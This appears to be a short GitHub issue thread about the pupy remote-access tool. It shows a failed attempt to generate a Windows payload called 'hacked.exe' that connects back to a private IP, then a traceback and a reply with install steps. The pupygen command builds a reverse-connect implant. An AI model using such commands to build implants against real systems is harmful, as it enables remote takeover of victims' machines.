### ISSUE TITLE
error creating my payload

### ISSUE THREAD

**Issue by Axe-Usa** [n1nj4sec/pupy#251]
./pupygen.py -f exe_x86 -o hacked.exe connect --host 192.168.137.129:81
Traceback (most recent call last):
  File "./pupygen.py", line 361, in <module>
    binary=get_edit_pupyx86_exe(conf, debug=args.debug)
  File "./pupygen.py", line 38, in get_edit_pupyx86_exe
    return get_edit_binary(os.path.join(ROOT, "payload_templates","pupyx86.exe"), conf)
  File "./pupygen.py", line 68, in get_edit_binary
    with open(path, 'rb') as f:
IOError: [Errno 2] No such file or directory: '/home/omar/Bureau/pupy-master/pupy/payload_templates/pupyx86.exe'

**Comment by gmod74** [comment]
Wait how did you fix this? Or am I just not seeing something...

**Comment by examined** [comment]
I had the same issue, but solved it by installing dependencies like this:

`git clone https://github.com/n1nj4sec/pupy.git pupy-master
cd pupy-master
git submodule init
git submodule update
pip install -r requirements.txt`
